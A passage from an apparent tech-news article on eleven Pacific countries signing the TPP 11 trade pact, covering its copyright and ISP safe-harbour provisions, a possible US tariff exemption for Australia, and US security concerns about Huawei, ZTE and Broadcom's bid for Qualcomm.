heist. How much they lost is currently unknown.
  25. Eleven Pacific countries have signed the Trans-Pacific Partnership trade pact, pushing ahead with the deal without America.Trade Minister Steve Ciobo is optimistic the Comprehensive and Progressive Agreement for Trans-Pacific Partnership (TPP 11) trade pact will take effect by the end of the year after Australia signed on to the jobs-boosting 11-country deal. The deal will eliminate 98 percent of tariffs in a marketplace worth close to $14 trillion. Speaking at the signing ceremony in Chile, Ciobo said the legislation to formalise the pact would be introduced to parliament this month ahead of a joint standing committee inquiry into the TPP. He expects Australia's domestic processes to be settled by the end of September. "This is a very good day for trade," Ciobo told a media conference in Santiago. "We are sending a mutual signal that we recognise the policy orthodoxy of trade." The deal had been on life support after the United States' withdrawal but was resuscitated in January following lobbying from Japan and Australia. "The world will be drinking more Australian wine, eating more Australian beef, and using more Australian services thanks to the TPP 11," Ciobo said. Ciobo said several other countries had expressed "peripheral interest" in joining the TPP. Speculation has rested on Indonesia, Thailand, Britain, and Columbia. He said Australian farmers, manufacturers, service providers, and small businesses would be the big winners. Australian exporters would benefit from new trade agreements with Canada and Mexico and greater market access to Japan, Chile, Singapore, Malaysia, Vietnam, and Brunei. Last month, the New Zealand government published the intellectual property chapter of the TPP 11, which detailed the safe harbour and fair use clauses agreed to between the parties, similar to those found in the floundered original TPP. The agreement sets out enforcement obligations against the infringement of copyright, including civil and criminal penalties with an aim of deterring future piracy, as well as civil remedies and compensation. "Each party shall provide that in civil judicial proceedings, its judicial authorities have the authority at least to order the infringer to pay the right holder damages adequate to compensate for the injury the right holder has suffered," it says. Criminal penalties are set out for cases of piracy on a commercial scale. The agreement gives ISPs safe harbour against piracy actions for providing connections, automated caching, storage, and referring or linking of users to online locations. "This framework of legal remedies and safe harbours shall include: Legal incentives for internet service providers to cooperate with copyright owners to deter the unauthorised storage and transmission of copyrighted materials or, in the alternative, to take other action to deter the unauthorised storage and transmission of copyrighted materials," the agreement states. Ciobo confirmed there was a side deal with Canada for the phase-out of tariffs on beef exports over five years. There is also a better deal for Australian cheese and beef exports to Japan, and new quotas for rice and wheat. Australian sugar would also have better access to Japan, Canada, and Mexico's markets. The TPP deal covers Australia, Brunei, Canada, Chile, Japan, Malaysia, Mexico, New Zealand, Peru, Singapore, and Vietnam. It comes as the US president signalled Australia may be exempt to a 25 percent tariff on steel and a 10 percent tariff on aluminium imports. Trump is expected to announce his tariff plans at the White House on Friday morning. The president singled out Australia, with praise for the "very close" relationship between the two countries after indicating he would be flexible with the detail of the penalties. Australian Prime Minister Malcolm Turnbull, who had been lobbying for an exemption, argued the TPP signing was an important statement in the cause of trade liberalisation. "A huge demonstration of our relentless commitment to getting every export opportunity made available for Australian businesses," Turnbull said. Following the withdrawal of the United States in January last year, at least half of the nations involved in the TPP have said they would instead consider Chinese-led multilateral trade deals such as the RCEP. In recent months, the United States has stepped up its anti-Chinese rhetoric, particularly in the realm of technology. In February, the heads of the CIA, FBI, NSA, and the director of national intelligence to the Senate Intelligence Committee recommended Americans do not use products from Huawei and ZTE. "We're deeply concerned about the risks of allowing any company or entity that is beholden to foreign governments that don't share our values to gain positions of power inside our telecommunications networks," FBI Director Chris Wray said at the time. "That provides the capacity to exert pressure or control over our telecommunications infrastructure. It provides the capacity to maliciously modify or steal information. And it provides the capacity to conduct undetected espionage." Earlier this week, the Committee on Foreign Investment in the US (CFIUS) said the attempts by Broadcom to purchase Qualcomm could pose a risk to the national security of the United States. CFIUS stated that should Broadcom take control, it could weaken Qualcomm and allow China to have greater influence over standards like 5G. With AAP Related Coverage TPP trade agreement passes with 11 member states While saying it is possible for the US to 'dock back in' to the TPP, the remaining 11 nations have announced that they will proceed with signing the multilateral trade agreement in March. TPP 11 pushes criminal and civil penalties for piracy Fair use and safe harbour regimes have been recommended under the Intellectual Property chapter of TPP 11, with the Pacific trade agreement also outlining civil and criminal penalties for piracy. China balks at joining TPP China's foreign minister has expressed doubts that the nation will join the TPP after the departure of the US from the free trade agreement, instead pushing the RCEP. 5G mobile networks: A cheat sheet (TechRepublic) As LTE networks become increasingly saturated, mobile network operators are planning for the 5G future. Here is what business professionals and mobile users need to know about 5G. Alibaba puts 11-qubits quantum power on public cloud Together with Chinese Academy of Sciences, Alibaba Cloud has unleashed superconducting quantum computing services on its public cloud, running on a processor with 11 quantum bits of power.
×
×
  • Create New...